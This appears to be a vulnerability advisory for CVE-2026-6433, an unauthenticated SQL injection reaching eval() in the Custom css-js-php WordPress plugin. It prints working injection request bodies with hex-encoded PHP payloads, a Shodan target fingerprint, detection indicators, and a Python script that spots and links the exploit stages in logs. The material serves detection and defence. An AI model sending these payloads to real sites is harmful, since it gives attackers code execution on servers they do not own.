CVE-2026-6433
Published: 2026-05-11

CVE-2026-6433: unauthenticated SQL injection reaching eval() in the Custom css-js-php WordPress plugin (through 2.0.7)

Priority: P2 (76), High
CVSS 3.1 base score: 7.3 (High)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:L / A:L
Flags: ITW (exploited in the wild), public exploit, VulnCheck KEV, initial access
EPSS: 0.75% (50.4th percentile)
The Custom css-js-php WordPress plugin through 2.0.7 does not properly sanitize user input before using it in a SQL query, and the result is passed to eval(), allowing unauthenticated users to execute arbitrary PHP code on the server.

Detection & IOCs (extracted from sources)

URL: /wp-admin/admin-ajax.php
Command (stage 1, inject; the hex literal decodes to `<?php file_put_contents('{{filename}}.txt','{{marker}}'); ?>`):
  action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702066696c655f7075745f636f6e74656e74732827{{hex_encode(filename)}}2e747874272c27{{hex_encode(marker)}}27293b203f3e,'header','',0,1--+
Command (stage 3, cleanup; the hex literal decodes to `<?php @unlink('{{filename}}.txt'); ?>`):
  action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702040756e6c696e6b2827{{hex_encode(filename)}}2e74787427293b203f3e,'header','',0,1--+
Path (stage 2, verify): /wp-admin/{{rand_text_alpha(8)}}.txt
Bytes: 0x3c3f706870 ("<?php" in hex; the prefix of the PHP payload carried in the UNION SELECT column)
  • The exploit targets the unauthenticated AJAX action 'fc_ajax_call' with operation 'wce_editor_inline_code' via POST to /wp-admin/admin-ajax.php; no authentication is required.
  • The attack uses a UNION-based SQL injection in the 'id' parameter to supply a hex-encoded PHP file_put_contents() payload that writes a .txt file under /wp-admin/. Detect POST requests to admin-ajax.php whose 'id' value contains UNION SELECT together with hex-encoded PHP tags.
  • The second-stage payload uses PHP @unlink() to remove the dropped file; monitor for POSTs to admin-ajax.php whose 'id' parameter contains the hex sequence 0x3c3f706870 (<?php).
  • The result of the injected query is passed to eval(), so the injection yields arbitrary PHP code execution; monitor for eval() calls originating from the custom-css-js-php plugin context.
  • Shodan fingerprint for exposed targets: http.component:"WordPress"; combine with detection of the fc_ajax_call action in web logs.
  • The Nuclei template randomizes the filename and marker per execution ({{rand_text_alpha(8)}} and {{rand_text_alpha(12)}}), so the dropped .txt path and its content marker differ on every attempt; static string matching on the filename alone is insufficient. The fixed parts of the payload (the action/operation pair, UNION SELECT in 'id', and the hex prefixes for file_put_contents and @unlink) are the stable indicators.
  • The exploit is a three-step flow (inject, verify the file write with a GET for the .txt, clean up); detection should correlate all three requests from the same source. The template treats a 200 or 500 response to the first POST as a success condition, so a 500 on admin-ajax.php does not mean the attempt failed.
  • Affected versions are 2.0.7 and below; the vulnerability is exploitable without any authentication (PR:N, UI:N), so no session or cookie indicators will be present in attacker traffic.
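The detection logic the bullets describe, as an added example that is not code from the page's sources, the plugin, or the Nuclei template. It classifies captured requests into the three exploit stages (decoding the MySQL hex literal to recover the dropped filename) and correlates them into chains keyed by that filename, applying the 200/500 success condition noted above. The request records, the source addresses (RFC 5737 documentation ranges), and the filename/marker values are constructed; a real deployment would feed this from a WAF or reverse-proxy log that captures POST bodies, since a plain access log does not record the 'id' parameter.

```python
"""Detect the three-step CVE-2026-6433 exploit flow in captured HTTP requests.

Added example, not code from the page's sources or the plugin. Request
records are constructed; the dict shape (src, method, path, body, status)
is an assumption, not a real log format.
"""
import re
from urllib.parse import parse_qs, urlsplit

PHP_OPEN_TAG_HEX = "3c3f706870"  # "<?php" as it appears inside the hex literal
UNION_RE = re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.IGNORECASE)
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]+)")
DROPPED_FILE_RE = re.compile(r"(?:file_put_contents|@?unlink)\('([^']+)\.txt'")
VERIFY_PATH_RE = re.compile(r"/wp-admin/([A-Za-z]{8})\.txt$")  # {{rand_text_alpha(8)}}.txt


def decode_hex_literals(value):
    """Decode every MySQL-style 0x... literal in value to text; odd-length hex is skipped."""
    decoded = []
    for match in HEX_LITERAL_RE.finditer(value):
        digits = match.group(1)
        if len(digits) % 2 == 0:
            decoded.append(bytes.fromhex(digits).decode("utf-8", errors="replace"))
    return decoded


def classify_request(req):
    """Map one request to an exploit stage: 'inject', 'cleanup', 'verify', or None."""
    path = urlsplit(req["path"]).path
    if req["method"] == "GET":
        m = VERIFY_PATH_RE.search(path)
        return {"stage": "verify", "dropped_file": m.group(1)} if m else None
    if req["method"] != "POST" or not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(req.get("body", ""), keep_blank_values=True)  # '+' becomes ' '
    if params.get("action", [""])[0] != "fc_ajax_call":
        return None
    if params.get("operation", [""])[0] != "wce_editor_inline_code":
        return None
    ident = params.get("id", [""])[0]
    # Both exploit POSTs carry a UNION SELECT and a hex literal that starts with "<?php".
    if not UNION_RE.search(ident) or PHP_OPEN_TAG_HEX not in ident.lower():
        return None
    php = " ".join(decode_hex_literals(ident))
    m = DROPPED_FILE_RE.search(php)
    stage = "cleanup" if "unlink(" in php else "inject"
    return {"stage": stage, "dropped_file": m.group(1) if m else None, "php": php}


def correlate(requests):
    """Group classified requests into chains keyed by the dropped filename.

    A chain is complete when the inject POST returned 200 or 500 (the template's
    success condition), the verify GET returned 200, and a cleanup POST was seen.
    """
    chains = {}
    for req in requests:
        hit = classify_request(req)
        if hit is None:
            continue
        key = hit["dropped_file"]
        if hit["stage"] == "verify" and key not in chains:
            continue  # a lone GET for an 8-letter .txt is not evidence by itself
        chain = chains.setdefault(key, {"src": req["src"], "stages": {}})
        chain["stages"][hit["stage"]] = req.get("status")
    for chain in chains.values():
        s = chain["stages"]
        chain["complete"] = (s.get("inject") in (200, 500)
                             and s.get("verify") == 200 and "cleanup" in s)
    return chains


# Constructed sample traffic: one full chain from 203.0.113.5 using the filename
# "qwertyui" and marker "abcdefghijkl" (both hex-encoded in the payload), plus noise.
_INJECT_HEX = ("3c3f7068702066696c655f7075745f636f6e74656e74732827"
               "7177657274797569" "2e747874272c27"
               "6162636465666768696a6b6c" "27293b203f3e")
_CLEANUP_HEX = "3c3f7068702040756e6c696e6b2827" "7177657274797569" "2e74787427293b203f3e"


def _ajax(payload_hex):
    return ("action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,"
            "'t','php',0x" + payload_hex + ",'header','',0,1--+")


SAMPLE_REQUESTS = [
    {"src": "203.0.113.5", "method": "POST", "path": "/wp-admin/admin-ajax.php",
     "body": _ajax(_INJECT_HEX), "status": 500},
    {"src": "203.0.113.5", "method": "GET", "path": "/wp-admin/qwertyui.txt",
     "body": "", "status": 200},
    {"src": "203.0.113.5", "method": "POST", "path": "/wp-admin/admin-ajax.php",
     "body": _ajax(_CLEANUP_HEX), "status": 500},
    {"src": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php",
     "body": "action=heartbeat&_nonce=abc", "status": 200},
    {"src": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php",
     "body": "action=fc_ajax_call&operation=wce_editor_inline_code&id=12", "status": 200},
]

if __name__ == "__main__":
    for name, chain in correlate(SAMPLE_REQUESTS).items():
        print(name, chain["src"], chain["stages"], "COMPLETE" if chain["complete"] else "partial")
```

The stable indicators are the action/operation pair, the UNION SELECT in 'id', and the decoded hex literal; the random filename only matters for tying the verify GET and the cleanup POST to the inject that preceded them.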

CVSS provenance

NVD: v3.1, 7.3 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
VulnCheck: 7.3 HIGH